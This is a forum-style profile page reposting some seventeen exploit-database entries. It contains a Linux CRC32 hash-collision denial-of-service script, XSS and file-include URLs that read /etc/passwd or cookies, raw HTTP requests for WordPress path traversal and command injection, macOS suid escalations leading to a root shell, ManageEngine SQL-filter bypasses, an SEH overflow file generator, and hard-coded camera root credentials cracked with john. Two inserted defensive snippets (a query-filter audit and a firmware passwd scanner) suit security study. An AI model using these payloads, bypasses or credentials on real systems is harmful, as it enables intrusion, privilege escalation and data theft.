HireHackking

Everything posted by HireHackking

  1. source: https://www.securityfocus.com/bid/56939/info

The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to cause an infinite loop, resulting in a denial-of-service condition.

#!/usr/bin/env python
# Python 2 script (uses file() and str.encode("hex")).
## Borrows code from
"""Calculate and manipulate CRC32.
http://en.wikipedia.org/wiki/Cyclic_redundancy_check
-- StalkR
"""
## See https://github.com/StalkR/misc/blob/master/crypto/crc32.py

import struct
import sys
import os

# Polynoms in reversed notation
POLYNOMS = {
    'CRC-32-IEEE': 0xedb88320,  # 802.3
    'CRC-32C': 0x82F63B78,      # Castagnoli
    'CRC-32K': 0xEB31D82E,      # Koopman
    'CRC-32Q': 0xD5828281,
}


class CRC32(object):
    """A class to calculate and manipulate CRC32.
    Use one instance per type of polynom you want to use.
    Use calc() to calculate a crc32.
    Use forge() to forge crc32 by adding 4 bytes anywhere.
    """

    def __init__(self, type="CRC-32C"):
        if type not in POLYNOMS:
            # the original raised an undefined "Error" class; ValueError is the builtin intended here
            raise ValueError("Unknown polynom. %s" % type)
        self.polynom = POLYNOMS[type]
        self.table, self.reverse = [0]*256, [0]*256
        self._build_tables()

    def _build_tables(self):
        for i in range(256):
            fwd = i
            rev = i << 24
            for j in range(8, 0, -1):
                # build normal table
                if (fwd & 1) == 1:
                    fwd = (fwd >> 1) ^ self.polynom
                else:
                    fwd >>= 1
                self.table[i] = fwd & 0xffffffff
                # build reverse table =)
                if rev & 0x80000000 == 0x80000000:
                    rev = ((rev ^ self.polynom) << 1) | 1
                else:
                    rev <<= 1
                rev &= 0xffffffff
                self.reverse[i] = rev

    def calc(self, s):
        """Calculate crc32 of a string.
        Same crc32 as in (binascii.crc32)&0xffffffff.
        """
        crc = 0xffffffff
        for c in s:
            crc = (crc >> 8) ^ self.table[(crc ^ ord(c)) & 0xff]
        return crc ^ 0xffffffff

    def forge(self, wanted_crc, s, pos=None):
        """Forge crc32 of a string by adding 4 bytes at position pos."""
        if pos is None:
            pos = len(s)
        # forward calculation of CRC up to pos, sets current forward CRC state
        fwd_crc = 0xffffffff
        for c in s[:pos]:
            fwd_crc = (fwd_crc >> 8) ^ self.table[(fwd_crc ^ ord(c)) & 0xff]
        # backward calculation of CRC up to pos, sets wanted backward CRC state
        bkd_crc = wanted_crc ^ 0xffffffff
        for c in s[pos:][::-1]:
            bkd_crc = ((bkd_crc << 8) & 0xffffffff) ^ self.reverse[bkd_crc >> 24] ^ ord(c)
        # deduce the 4 bytes we need to insert
        for c in struct.pack('<L', fwd_crc)[::-1]:
            bkd_crc = ((bkd_crc << 8) & 0xffffffff) ^ self.reverse[bkd_crc >> 24] ^ ord(c)
        res = s[:pos] + struct.pack('<L', bkd_crc) + s[pos:]
        return res


if __name__ == '__main__':
    hack = False          # set to True to forge the file names so their CRC-32C collides
    ITERATIONS = 10
    crc = CRC32()
    wanted_crc = 0x00000000
    for i in range(ITERATIONS):
        for j in range(55):
            # random hex name; "str" was the original variable name, renamed so the builtin is not shadowed
            name = os.urandom(16).encode("hex").strip("\x00")
            if hack:
                f = crc.forge(wanted_crc, name, 4)
                if ("/" not in f) and ("\x00" not in f):
                    file(f, 'a').close()
            else:
                file(name, 'a').close()
        wanted_crc += 1
  2. source: https://www.securityfocus.com/bid/56995/info

The Bit Component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

http://www.example.com/index.php?option=com_bit&controller=../../../../../../../../../../../../../../../etc/passwd%00
  3. Source: https://code.google.com/p/google-security-research/issues/detail?id=478

The Install.framework runner suid root binary does not correctly account for the fact that Distributed Objects can be connected to by multiple clients at the same time.

By connecting two proxy objects to an IFInstallRunner and calling [IFInstallRunner makeReceiptDirAt:asRoot:] in the first and passing a custom object as the directory name we can get a callback to our code just after the makeReceiptDirAt code has called seteuid(0);setguid(0) to regain privs. Since BSD privileges are per-process this means that our other proxy object will now have euid 0 without having to provide an authorization reference. In this second proxy we can then just call runTaskSecurely and get a root shell before returning from the first proxy's callback function which will then drop privs.

Build using the provided makefile and run passing the full path to the localhost shell.

Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38136.zip
  4. Exploit Title: ManageEngine EventLog Analyzer SQL query execution
Product: ManageEngine EventLog Analyzer
Vulnerable Versions: v10.6 build 10060 and previous versions
Tested Version: v10.6 build 10060 (Windows)
Advisory Publication: 14/09/2015
Vulnerability Type: authenticated SQL query execution
Credit: xistence <xistence[at]0x90.nl>

Product Description
-------------------
EventLog Analyzer carries out log analysis for all Windows, Linux and Unix systems, switches and routers (Cisco), other syslog-supporting devices, and applications like IIS and MS SQL. The EventLog Analyzer application is capable of performing real-time log file analysis. The event log file analyzer application can carry out log file analysis of imported files. The files can be imported from the archive or from any machine. When an important security event is generated on a machine in the network, the event log file analyser application collects, performs log analysis and displays the event on the EventLog Analyzer Dashboard, in real-time. The event log report is generated from the analyzed event logs. From the event log reports (graphs), you can drill down to the raw log events and do a root cause analysis within minutes, and then focus on resolving it. The logging analyser application carries out imported and archived log file analyses to fulfill the requirements of forensic analysis and event log audit. The forensic and audit reports can be generated from the analyzed logs.

Vulnerability Details
---------------------
Every user has the ability to execute SQL queries through the "/event/runQuery.do" script, including the default "guest" user. (The SQL query option is just not visible in the web interface.)

Below is the POST request, executed as "guest":

POST /event/runQuery.do HTTP/1.1
Host: 192.168.2.116:8400
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=XXXXXXXXXX
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

execute=true&query=select+version%28%29

Access to queries starting with "INSERT" or "UPDATE" is denied by default, however this can be bypassed by doing a select query first, like this: "SELECT 1;INSERT INTO ..."

The included Postgres backend is running with SYSTEM privileges on Windows, allowing files to be written to disk with these privileges.

A Metasploit exploit module will be released shortly.

Solution
--------
ManageEngine has provided a patch to fix this issue, the steps to apply/fix this are as below:

1. Stop the ELA service.
2. Download the zip from http://bonitas2.zohocorp.com/zipUploads/2015_14_07_17_52_30_o_19q686iqs1sfemdf19e05sqre61.tar.gz and extract the folders. You would have two folders "EventLogAnalyzerJSP" and "LogAnalyzerClient" under "o_19q686iqs1sfemdf19e05sqre61". Copy these two folders and place them under the <ELA Home>//lib/ folder.
3. The path of the following files would be as below:
   runQuery_jsp.class --> <ELA Home>\\lib\\EventLogAnalyzerJSP\\com\\adventnet\\sa\\jsp\\WEB_002dINF\\jsp
   RunQuery.class --> <ELA Home>\\lib\\LogAnalyzerClient\\com\\adventnet\\la\
4. Restart the ELA service and check for the issue.

Advisory Timeline
-----------------
07/11/2015 - Discovery and vendor notification
07/13/2015 - ManageEngine acknowledged issue
07/14/2015 - ManageEngine supplied fix
07/16/2015 - Verified fix and replied back to ManageEngine that the issue has been resolved
09/14/2015 - Public disclosure
  5. Source: https://code.google.com/p/google-security-research/issues/detail?id=477

Install.framework has a suid root binary here:

/System/Library/PrivateFrameworks/Install.framework/Resources/runner

This binary vends the IFInstallRunner Distributed Object, which has the following method:

[IFInstallRunner makeReceiptDirAt:asRoot:]

If you pass 1 for asRoot, then this code will treat the makeReceiptDirAt string as a path and make two directories (Library/Receipts) below it.

At first glance this code looks immediately racy and no doubt we could play some symlink tricks to get arbitrary directories created, but, on second glance, we can do a lot more!

This code is using distributed objects which is a "transparent" IPC mechanism: what this means in practice is that not only can I call methods on the IFInstallRunner object running in the suid root process, but I can also pass it objects from my process; when the suid root process then tries to call methods on those objects this will actually result in callbacks into my process :)

In this case rather than just passing an NSString as the makeReceiptDirAt parameter I create and pass an instance of my own class "InitialPathObject" which behaves a bit like a string but gives me complete control over its behaviour from my process.

By creating a couple of these custom classes and implementing various methods we can reach calls to mkdir, chown and unlink with euid == 0. We can completely control the string passed to mkdir and unlink. In the chown case the code will chown our controlled path to root:admin; regular os x users are members of the admin group which means that this will give the user access to files which previously belonged to a different group.

To hit the three actions (mkdir, chown and unlink) with controlled arguments we need to override various combinations of selectors and fail at the right points:

InitialPathObject = the object we pass to the makeReceiptDirAt selector
  overrides:
  - stringByAppendingPathComponent
    * will be called twice:
      * first time: return an NSString* pointing to a non-existent file
      * second time: return SecondFakeStringObject

SecondFakeStringObject = returned by the second call to stringByAppendingPathComponent
  overrides:
  - length
    * will be called by the NSFileManager?
    * return length of path to non-existent file
  - getCharacters:
    * will be called by the NSFileManager?
    * return characters of the non-existent file path
  - fileSystemRepresentation
    * for MKDIR:
      * first time: return char* of the target path
      * second time: return char* to non-existent file
      * third time: return char* to non-existent file
    * for CHOWN:
      * first time: return char* of temporary directory to create and ignore
      * second time: return char* of target path
    * for UNLINK:
      * first time: return char* of temporary directory to create and ignore
      * second time: return char* to non-existent file
      * third time: return char* to path to unlink
  - stringByAppendingPathComponent:
    * for MKDIR:
      * not called
    * for CHOWN:
      * return NSString* pointing to file which does exist // to bail out before creating /Receipts
    * for UNLINK:
      * not called

build: clang -o as_root_okay_then_poc as_root_okay_then_poc.m -framework Foundation

run: ./as_root_okay_then_poc MKDIR|CHOWN|UNLINK <target>

Note that this will create some root-owned temporary directories in /tmp which will need to be manually cleaned up.

Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38137.zip
  6. source: https://www.securityfocus.com/bid/57190/info

The Incapsula component for Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Incapsula 1.4.6_b and prior are vulnerable.

http://www.example.com/administrator/components/com_incapsula/assets/tips/en/Security.php?token="><script>alert(document.cookie)</script>
http://www.example.com/administrator/components/com_incapsula/assets/tips/en/Performance.php?token="><script>alert(document.cookie)</script>
  7. Source: https://code.google.com/p/google-security-research/issues/detail?id=314

The private Install.framework has a few helper executables in /System/Library/PrivateFrameworks/Install.framework/Resources, one of which is suid root:

-rwsr-sr-x 1 root wheel 113K Oct 1 2014 runner

Taking a look at it we can see that it's vending an objective-c Distributed Object :) [ https://developer.apple.com/library/mac/documentation/Cocoa/Conceptual/DistrObjects/DistrObjects.html ]

The main function immediately temporarily drops privs doing seteuid(getuid()); setegid(getgid()); then reads a line from stdin. It passes this to NSConnection rootProxyForConnectionWithRegisteredName to look up that name in the DO namespace and create a proxy to connect to it via.

It then allocates an IFInstallRunner which in its init method vends itself using a name made up of its pid, time() and random(). It then calls the setRunnerConnectionName method on the proxy to tell it the IFInstallRunner's DO name so that whoever ran the runner can connect to the IFInstallRunner.

The IFRunnerMessaging protocol tells us the methods and prototypes of the remote methods we can invoke on the IFInstallRunner.

Most of the methods begin with a call to processKey which will set the euid back to root if the process can provide a valid admin authorization reference from authd (I'm not totally sure how that bit works yet, but it's not important for the bug.) Otherwise the euid will remain equal to the uid and the methods (like movePath, touchPath etc) will only run with the privs of the user. The methods then mostly end with a call to restoreUIDs which will drop back to euid==uid if we did temporarily regain root privs (with the auth ref.)

Not all methods we can invoke are like that though...

IFInstallRunner setExternalAuthorizationRef calls seteuid(0);setegid(0); to regain root privs without requiring any auth. It then calls AuthorizationCreateFromExternalForm passing the bytes of an NSData we give it. If that call doesn't return 0 then the error branch calls syslog with the string: "Fatal error: unable to internalize authorization reference." but there's actually nothing fatal, it just returns from the method, whereas the success branch goes on to restore euid and egid, which means that if we can get AuthorizationCreateFromExternalForm to fail then we can get the priv dropping-regaining state machine out-of-sync :)

Getting AuthorizationCreateFromExternalForm to fail is trivial, just provide a malformed auth_ref (like "AAAAAAAAAAAAAAAAAAA"). Now the next method we invoke will run with euid 0 even without having the correct auth ref :)

This PoC first calls setBatonPath to point the baton executable path to a localhost bind-shell then triggers the bug and calls runTaskSecurely which will create an NSTask and launch the bind-shell with euid 0 :) We can then just nc to it and get a root shell.

tl;dr: the error path in setExternalAuthorizationRef should either be fatal or drop privs!

Make sure you have the latest xcode installed and run the get_shell.sh script to build and run the PoC.

Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38138.zip
  8. Exploit Title: ManageEngine OpManager multiple vulnerabilities
Product: ManageEngine OpManager
Vulnerable Versions: v11.5 and previous versions
Tested Version: v11.5 (Windows)
Advisory Publication: 14/09/2015
Vulnerability Type: hardcoded credentials, SQL query protection bypass
Credit: xistence <xistence[at]0x90.nl>

Product Description
-------------------
ManageEngine OpManager is a network, server, and virtualization monitoring software that helps SMEs, large enterprises and service providers manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to set up a 24x7 monitoring system within hours of installation. Do-it-yourself plug-ins extend the scope of management to include network change and configuration management and IP address management as well as monitoring of networks, applications, databases, virtualization and NetFlow-based bandwidth.

Vulnerability Details
---------------------
ManageEngine OpManager ships with a default account "IntegrationUser" with the password "plugin". This account is hidden from the user interface and will never show up in the user management. Also changing the password for this account is not possible by default. The account however is assigned Administrator privileges and logging in with this account is possible via the web interface.

Below you can see the account in the PostgreSQL database after a fresh installation:

C:\ManageEngine\OpManager\pgsql\bin>psql.exe -h 127.0.0.1 -p 13306 -U postgres -d OpManagerDB
psql (9.2.4)

OpManagerDB=# select * from userpasswordtable where userid = 2;
 userid |    username     | password  | ownername | domainname | sipenabled
--------+-----------------+-----------+-----------+------------+------------
      2 | IntegrationUser | d7962CgyJ | NULL      | NULL       | false
(1 row)

The above password decrypted is "plugin".

Any account that has access to the web interface with Administrator rights can use a web form (/api/json/admin/SubmitQuery) to execute SQL queries on the backend PostgreSQL instance. By default restrictions apply and queries that start with INSERT/UPDATE/DELETE are not allowed to be executed, this is however very easy to bypass by using something like "INSERT/**/INTO...". The "/**/" comment will create a space and the function is not detected by OpManager's protection and will be executed.

The PostgreSQL environment runs as SYSTEM under Windows. By writing a WAR payload to the "tomcat/webroot" directory, the WAR payload will be deployed automatically and will give a shell with SYSTEM privileges.

A metasploit module will be released shortly.

Solution
--------
ManageEngine has provided a patch to fix this issue: https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability

Advisory Timeline
-----------------
05/17/2015 - Discovery and vendor notification
05/22/2015 - ManageEngine acknowledged issue
07/10/2015 - Requested status update
07/17/2015 - ManageEngine supplied fix
07/24/2015 - ManageEngine provided definitive fix at https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability
09/14/2015 - Public disclosure
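Both ManageEngine advisories above (runQuery.do in EventLog Analyzer and SubmitQuery in OpManager) describe the same defect: a query filter that only looks at the first few raw characters, defeated by "SELECT 1;INSERT ..." and "INSERT/**/INTO ...". The following is an added example, not code from either advisory or from the vendor, modelling that weak check beside a hardened one (comment stripping, stacked-statement refusal, allow-listed leading keyword) so a reviewer can see exactly which inputs slip past which filter. The shape of the weak check is an assumption, not ManageEngine's source.

```python
import re

# Constructed sample queries: the legitimate query from the EventLog Analyzer
# request above, the two bypass shapes both advisories describe, a query a
# plain prefix check does catch, and a benign query with ';' inside a literal.
SAMPLE_QUERIES = [
    "select version()",
    "SELECT 1;INSERT INTO t VALUES (1)",
    "INSERT/**/INTO t VALUES (1)",
    "  update t set a=1",
    "select 'a;b' from t",
]

DENIED_KEYWORDS = ("INSERT", "UPDATE", "DELETE")
ALLOWED_FIRST_KEYWORDS = {"SELECT"}


def prefix_denylist_allows(query):
    """Model of the weak protection the advisories describe (assumed shape,
    not the vendor's code): deny only when the raw text begins with a write
    keyword followed by a space. Returns True when the query would run."""
    head = query.strip().upper()
    return not head.startswith(tuple(k + " " for k in DENIED_KEYWORDS))


def normalize(query):
    """Drop /* */ and -- comments and collapse whitespace, so the keyword
    check sees the statement the way the database parser will."""
    without_block = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)
    without_line = re.sub(r"--[^\n]*", " ", without_block)
    return " ".join(without_line.split())


def has_stacked_statement(query):
    """True when a ';' occurs outside a single-quoted string literal, i.e. a
    second statement is chained onto the first ("SELECT 1;INSERT ...")."""
    in_string = False
    for ch in query:
        if ch == "'":
            in_string = not in_string      # a doubled '' toggles twice: harmless
        elif ch == ";" and not in_string:
            return True
    return False


def hardened_allows(query):
    """Defense-in-depth filter: normalize first, refuse stacked statements
    (a trailing ';' is refused too), and allow-list the leading keyword
    instead of deny-listing a few. The real fix is still not to expose raw
    SQL execution to low-privilege roles at all."""
    q = normalize(query)
    if not q or has_stacked_statement(q):
        return False
    m = re.match(r"[A-Za-z_]+", q)
    return bool(m) and m.group(0).upper() in ALLOWED_FIRST_KEYWORDS


def audit(queries):
    """Return (query, weak_check_allows, hardened_check_allows) per query;
    rows where the two columns disagree are exactly the bypasses."""
    return [(q, prefix_denylist_allows(q), hardened_allows(q)) for q in queries]


if __name__ == "__main__":
    for q, weak, hard in audit(SAMPLE_QUERIES):
        print("%-40r weak=%-5s hardened=%s" % (q, weak, hard))
```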
  9. source: https://www.securityfocus.com/bid/57212/info

Dell OpenManage Server Administrator is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

OpenManage Server Administrator 7.1.0.1 and prior versions are vulnerable.

https://www.example.com:1311/help/sm/en/Output/wwhelp/wwhimpl/js/html/index_main.htm?topic="></iframe><iframe src="javascript:alert(/xss/)
  10. # Exploit Title: EZ SQL Reports < 4.11.37: Arbitrary File Download (admin/collaborator required)
# Google Dork: -
# Date: 12/09/2015
# Exploit Author: Felipe Molina (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/elisqlreports/
# Software Link: https://downloads.wordpress.org/plugin/elisqlreports.4.11.33.zip
# Version: < 4.11.33, fixed in 4.11.37
# Tested on: Debian GNU/Linux 7 with Wordpress 4.3
# CVE : N/A
#
# Summary: The plugin allows a wordpress site administrator or collaborator to download arbitrary files from the host file system through the plugin functionality of downloading .sql, .sql.zip or .sql.gz files created by the wordpress administrator.
# The file name to download is not sanitized and path traversal can be injected in the request.
#
# Timeline:
# - 09/09/2015: First contact with the author
# - 11/09/2015: Author creates fix and communicates it to me
# - 12/09/2015: Public release of the new plugin version
#
# POC: To retrieve the wp-config.php file:

GET /wp-admin/admin.php?page=ELISQLREPORTS-settings&Download_SQL_Backup=../../../wp-config.php HTTP/1.1
Host: <the host with the wordpress>
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: <User-Agent>
Referer: http://<the host with the wordpress>/wp-admin/admin.php?page=ELISQLREPORTS-settings
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_[...etc...]4af418c3efd


# Exploit Title: EZ SQL Reports < 4.11.37: Arbitrary Code Execution (admin/collaborator required)
# Google Dork: -
# Date: 12/09/2015
# Exploit Author: Felipe Molina (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/elisqlreports/
# Software Link: https://downloads.wordpress.org/plugin/elisqlreports.4.11.33.zip
# Version: < 4.11.33, fixed in 4.11.37
# Tested on: Debian GNU/Linux 7 with Wordpress 4.3
# CVE : N/A
#
# Summary: There are several calls to "passthru" in the code, one of them is receiving the username, password, database name and host from the $_POST arguments, so you can inject into each of these parameters the ";" character or others like "&&" or "||" to execute other distinct commands to "/usr/bin/mysql"
#
# Timeline:
# - 09/09/2015: First contact with the author
# - 11/09/2015: Author creates fix and communicates it to me
# - 12/09/2015: Public release of the new plugin version
#
# POC: Send a POST request like this to obtain in the folder wp-admin a file with name "testrce.txt". The parameters DB_NAME, DB_HOST, DB_USER, and DB_PASSWORD are injectable:

POST /wp-admin/admin.php?page=ELISQLREPORTS-settings HTTP/1.1
Host: <wordpress web>
Proxy-Connection: keep-alive
Content-Length: 177
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://<wordpress web>
Upgrade-Insecure-Requests: 1
User-Agent: <the user agent>
Content-Type: application/x-www-form-urlencoded
Referer: http://<wordpress web>/wp-admin/admin.php?page=ELISQLREPORTS-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_8fa[...etc...]b7d

DB_NAME=<the db name>%3B+touch+testrce.txt%3B+&DB_HOST=127.0.0.1&DB_USER=<theuser>&DB_PASSWORD=<thepassword>&db_date=z.2015-08-27-20-22-29.manual.wp.127.0.0.1.sql.zip&db_nonce=au78c5ff86
  11. source: https://www.securityfocus.com/bid/57200/info

The NextGEN Gallery plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

NextGEN Gallery 1.9.10 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=[Xss]
  12. [+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt

Vendor:
================================
www.checkpoint.com
http://pingtool.org/downloads/IKEView.exe

Product:
==================================================
IKEView.exe Feature Pack NGX R60 - Build 591000004

IKEView.EXE is used to inspect internet private key exchanges on the firewall phase (1 & 2) packets being exchanged with switches and gateways. IKEVIEW is a Checkpoint partner tool available for VPN troubleshooting purposes. It is a Windows executable that can be downloaded from Checkpoint.com. This file parses the IKE.elg file located on the firewall.

To use IKEVIEW for VPN troubleshooting do the following:

1. From the checkpoint firewall type the following: vpn debug ikeon
   This will create the IKE.elg file located in $FWDIR/log
2. Attempt to establish the VPN tunnel. All phases of the connection will be logged to the IKE.elg file.
3. SCP the file to your local desktop. WINSCP works great
4. Launch IKEVIEW and select File>Open. Browse to the IKE.elg file.

Vulnerability Type:
======================
Stack Buffer Overflow

CVE Reference:
==============
N/A

Vulnerability Details:
=====================
IKEView.exe is vulnerable to a local stack based buffer overflow when parsing a malicious (internet key exchange) ".elg" file. The vulnerability causes nSEH & SEH pointer overwrites at 4432 bytes after IKEView parses our malicious file, which may then result in arbitrary attacker supplied code execution.

Tested on Windows SP1

0018F868  |41414141  AAAA
0018F86C  |01FC56D0  ÐVü   ASCII "File loaded in 47 minutes, 00 seconds."
0018F870  |41414141  AAAA
0018F874  |41414141  AAAA  Pointer to next SEH record
0018F878  |42424242  BBBB  SE handler
0018F87C  |00000002  ...

Quick Buffer Overflow POC :
===========================
1) Below python file to create POC, save as .py; it will generate the POC file, open in IKEView.exe and KABOOOOOOOOOOOOOOOOOOOOM!

seh="B"*4  #<---------- will overwrite SEH with bunch of 42's HEX for 'B' ASCII char.
file="C:\\IKEView-R60-buffer-overflow.elg"
x=open(file,"w")
payload="A"*4428+seh
x.write(payload)
x.close()
print "\n=======================================\n"
print " IKEView-R60-buffer-overflow.elg file created\n"
print " hyp3rlinx ..."
print "=========================================\n"

Exploitation Technique:
=======================
Local

Severity Level:
=========================================================
High

Description:
==========================================================
Vulnerable Product: [+] IKEView.exe Feature Pack NGX R60 - Build 591000004
Vulnerable File Type: [+] .elg
Affected Area(s): [+] Local OS

===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx
  13. source: https://www.securityfocus.com/bid/57230/info

TinyBrowser is prone to multiple vulnerabilities.

An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
  14. TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi Hard-Coded Credentials

Vendor: TP-LINK Technologies Co., Ltd.
Product web page: http://www.tp-link.us
Affected version: NC220 V1 1.0.28 Build 150629 Rel.22346
                  NC200 V1 2.0.15 Build 150701 Rel.20962

Summary: Designed with simplicity in mind, TP-LINK's Cloud Cameras are a fast and trouble free way to keep track on what's going on in and around your home. Video monitoring, recording and sharing has never been easier with the use of TP-LINK's Cloud service. The excitement of possibilities never ends.

Desc: NC220 and NC200 utilize hard-coded credentials within their Linux distribution image. These sets of credentials (root:root) are never exposed to the end-user and cannot be changed through any normal operation of the camera.

Tested on: Linux

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5255
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5255.php

20.07.2015

--

Initializing...

root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin |grep root
root_uImage
p2048_newroot.cer
root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:bin/sh
Nproot:x:0:
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin | grep home > crack.me
root@zslab:~# john crack.me
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
root             (root)
guesses: 1  time: 0:00:00:00 DONE (Mon Aug  3 05:52:55 2015)  c/s: 400  trying: root - Userroot
Use the "--show" option to display all of the cracked passwords reliably
root@zslab:~# john crack.me --show
root:root:0:0:Linux User,,,:/home/root:/bin/sh

1 password hash cracked, 0 left
root@zslab:~#
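The strings | grep step above is the manual version of a firmware audit check: find passwd-format records baked into the image and flag any account whose password hash (or lack of one) ships with the device. The following is an added example, not part of the advisory, that does that over a constructed blob; the root line is copied from the advisory's strings output, the other two records and the account classification rules are my own assumptions.

```python
import re

# Constructed sample blob: binary noise around the passwd-style line the
# advisory found with strings | grep (copied from its output), plus two
# records of my own so the classifier has shadowed and locked cases to sort.
SAMPLE_IMAGE = (
    b"\x7fELF\x01\x01\x00root_uImage\x00p2048_newroot.cer\x00"
    b"root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:bin/sh\n"
    b"daemon:*:1:1:daemon:/:/bin/false\n"
    b"admin:x:1000:1000::/home/admin:/bin/sh\n"
    b"\x00\x00root:x:0:\x00"
)

# Seven colon-separated passwd fields; no NUL, newline or colon inside a field.
# A trailing "name:x:0:" group-file record has only four fields and is skipped.
PASSWD_RE = re.compile(
    rb"([A-Za-z_][A-Za-z0-9_-]*):([^:\n\x00]*):(\d+):(\d+):"
    rb"([^:\n\x00]*):([^:\n\x00]*):([^:\n\x00]*)"
)


def classify_hash(field):
    """Name the kind of credential a passwd password field carries."""
    if field == "x":
        return "shadowed"          # real hash lives in /etc/shadow, check that too
    if field == "":
        return "empty"             # no password at all
    if field.startswith(("*", "!")):
        return "locked"
    if field.startswith("$1$"):
        return "md5-crypt"         # cheap to compute: john cracked the one above instantly
    if field.startswith("$5$"):
        return "sha256-crypt"
    if field.startswith("$6$"):
        return "sha512-crypt"
    if field.startswith("$2"):
        return "bcrypt"
    return "des-crypt-or-unknown"


def find_passwd_entries(blob):
    """Pull every passwd-format record out of a firmware image, with its offset."""
    entries = []
    for m in PASSWD_RE.finditer(blob):
        user, pw, uid, gid, gecos, home, shell = (
            g.decode("ascii", "replace") for g in m.groups()
        )
        entries.append({
            "user": user, "uid": int(uid), "gid": int(gid),
            "hash_type": classify_hash(pw), "home": home, "shell": shell,
            "offset": m.start(),
        })
    return entries


def audit_firmware(blob):
    """Report accounts whose password is baked into the image itself: a usable
    hash (not shadowed, not locked) or no password. uid 0 is rated critical."""
    findings = []
    for e in find_passwd_entries(blob):
        if e["hash_type"] in ("shadowed", "locked"):
            continue
        severity = "critical" if e["uid"] == 0 else "high"
        findings.append({**e, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in audit_firmware(SAMPLE_IMAGE):
        print("%s: %s uid=%d %s at offset %d"
              % (f["severity"], f["user"], f["uid"], f["hash_type"], f["offset"]))
```

Run it over a real image by replacing SAMPLE_IMAGE with open(path, "rb").read(); a "shadowed" result only means the check has to be repeated on the embedded /etc/shadow.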
  15. source: https://www.securityfocus.com/bid/57230/info

TinyBrowser is prone to multiple vulnerabilities.

An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

http://www.example.com/js/tiny_mce/plugins/tinybrowser/edit.php?type=
  16. source: https://www.securityfocus.com/bid/57230/info

TinyBrowser is prone to multiple vulnerabilities.

An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=
  17. '''
********************************************************************************************
# Exploit Title: Total Commander 32bit SEH Overwrite.
# Date: 8/27/2015
# Exploit Author: Un_N0n
# Software Vendor: http://www.ghisler.com/
# Software Link: http://www.ghisler.com/download.htm
# Version: 8.52
# Tested on: Windows 8 x64(64 BIT)
********************************************************************************************

[Info:]
EAX 00106541
ECX FFFFFEFA
EDX 0031E941
EBX 04921F64
ESP 001065FC
EBP 41414141
ESI 04930088
EDI 0031E9B0
EIP 41414141

SEH chain of main thread, item 0
 Address=001065FC
